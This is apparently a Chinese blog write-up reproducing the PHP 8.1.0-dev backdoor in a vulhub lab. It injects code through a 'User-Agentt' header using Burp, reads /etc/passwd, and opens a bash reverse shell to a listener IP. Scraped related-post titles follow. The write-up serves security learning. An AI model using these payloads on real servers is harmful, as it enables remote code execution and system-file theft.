漏洞描述

PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。

漏洞危害

攻击者可以通过user-agent来执行恶意代码获取重要信息。
漏洞等级
高危 ★★★★

影响范围

PHP 8.1.0-dev

加固方法

建议参考官方公告及时升级或安装相应补丁。
参考链接:
https://news-web.php.net/php.internals/113838
https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
https://www.php.net/

利用工具

网上寻找poc。

验证过程

环境准备

1、首先在ununtu中开启所需要的环境

启动docker环境:service docker start

2、启动整个编译环境

docker-compose up -d

3、查看环境启动状态

docker-compose ps

4、查看靶机ip并用物理机进行访问靶机ip的8080端口


漏洞复现

1、访问漏洞页面,然后打开Burp抓取首页的包并发送到Repeater(重放)模块

2、在数据包中添加User-Agentt: 字段并在后面添加上测试漏洞poc:

zerodiumvar_dump(3*7);

3、将字段后面poc修改为zerodiumsystem(“cat /etc/passwd”);读取文件

4、修改payload执行反弹shell,打开一台kali并设置监听,将poc修改为以下反弹shell的poc

zerodiumsystem(“bash -c ‘exec bash -i >& /dev/tcp/192.168.126.130/6678 0>&1’”);

vulhub 8.1-backdoor漏洞复现相关推荐

  1. Vulhub靶场之struts2漏洞复现

    简介 struts2漏洞中属s2系列杀伤力最大,可以造成远程命令执行漏洞. Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架.Apache Struts于2020年 ...

  2. weblogic漏洞复现整理汇总(vulhub)

    weblogic漏洞复现整理汇总(vulhub) 目录 weblogic漏洞复现整理汇总(vulhub) 一.概述 二.任意文件上传漏洞(CVE-2018-2894) 三.XMLDecoder反序列化 ...

  3. 【漏洞复现】CNVD-2022-86535-ThinkphpV6多语言

    漏洞原理 ThinkPHP在开启多语言功能的情况下存在文件包含漏洞,攻击者可以通过get.header.cookie等位置传入参数,实现目录穿越与文件包含组合拳的利用,通过pearcmd文件包含这个t ...

  4. Apereo CAS 4.1 反序列化 RCE 漏洞复现实验报告

    演示视频 Apereo CAS 4.1 反序列化 RCE 漏洞_哔哩哔哩_bilibiliBGM:<芳华慢>+<霜雪千年>(by等什么君)https://www.bilibil ...

  5. docker kali安装mysql_kali安装docker(有效详细的教程) ——vulhub漏洞复现 001

    前记: 博主有着多次安装docker的丰富经验,曾经为了在kali成功安装docker花费不少时间.在kali2016.3一直到最新的kali2019.4都通吃!所以跟着下面的步骤走,绝对不会出错.( ...

  6. 【vulhub】Apereo CAS 4.1 反序列化命令执行漏洞复现

    楼主困了,这里就直接写上楼主自己的一些操作 详细过程可以看Apereo CAS 4.1 反序列化命令执行漏洞复现 特征: 1.网站根目录下有cas目录 2.如图所示,有apereo CAS图标 3.如 ...

  7. 【Vulhub】Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)

    脚本小子上线啦,开始复现以前出现实战环境的漏洞了,我会记录一些复现的漏洞(不会是全部),今天这个漏洞的原理我也不太会就知道是个Java反序列化的洞,只负责复现(脚本小子~). 漏洞介绍&环境搭 ...

  8. vulhub中Spring之CVE-2017-8046漏洞复现

    vulhub中Spring之CVE-2017-8046漏洞复现 Spring Data Rest 远程命令执行漏洞(CVE-2017-8046) 漏洞复现 漏洞说明 漏洞利用条件和方式 漏洞影响范围 ...

  9. 渗透测试-----信息收集(概述、whois、子域名查询、爆破、vulhub域名传送漏洞复现、kali安装docker)

    文章目录 渗透测试 信息收集 1. 概述 2. 供练手的网站 3. whois查询 4. 子域名查询 域传送漏洞 1. 概述 2. 解决办法 3. vulhub漏洞复现 4. 子域名爆破 渗透测试 信 ...

  10. (一)vulhub专栏:FastJson1.2.24、1.2.27漏洞复现

    入职大厂必会 写在前面的话:请注意本篇博客最后面的附(注意java版本),本篇博客采用的是LDAP服务getshell,rmi同理.阅读本篇博客需了解fastjson,ldap,rmi. 启动靶场 在 ...

最新文章

  1. GNS3中配置PIX enable ×××
  2. 想客户之所想 华为全栈云加速行业云化创新
  3. 三方库报错真的就没有办法了吗?
  4. 鸿蒙系统暗黑2,暗黑破坏神2为什么被称为神作!看看装备强化系统就知道有多完美...
  5. python文件编码转换工具_python实现unicode转中文及转换默认编码的方法
  6. 管理Shader——Shader概览
  7. CSS挂马及相应防范方法
  8. 【CF311E】biologist
  9. 批量重命名同一文件夹下的文件
  10. script language=javascriptwindow.location.href=http://blog.securitycn.net/script
  11. vue 判断是否是微信浏览器
  12. 设为首页加入收藏代码_兼容各浏览器ie系列Firefox
  13. 最早的支付网关(滴滴支付)和最新的聚合支付设计架构
  14. Sprinboot支付宝h5支付、退款(java版)
  15. PIC单片机应用开发实践教程(三): MCU配置位与烧录
  16. 裤子尺码对照表eur40_裤子尺寸对照表,衣服尺寸对照表,服装尺寸对照表- 尺码对照表...
  17. springboot 实现图片合并
  18. vue中element中的input框和laod中防抖和节流结合使用(性能优化)使用lodash相关方法
  19. 一张图看懂华为2019年关键业务进展
  20. PreTranslateMessage和TranslateMessage区别

热门文章

  1. SCCM制作启动镜像和U盘引导装机记录
  2. shell脚本:自动更新动态域名的IP地址
  3. 【数字电路抢救】2 逻辑函数的代数化简 3逻辑表达式的化简
  4. pycharm报错: with exit code -1073740791 (0xC0000409)
  5. 如何用golang远程控制浏览器
  6. HTML5期末大作业:仿悦世界游戏网站设计——仿悦世界游戏官网(6页) HTML+CSS+JavaScript web网页设计实例作业
  7. MongoDB分片入门
  8. delphi 18位身份证号码的校验
  9. java题目青蛙跳杯子_蓝桥杯 历届试题 青蛙跳杯子
  10. java写宽带连接.adsl拨号,并且检测断线自动重新连接,更换ip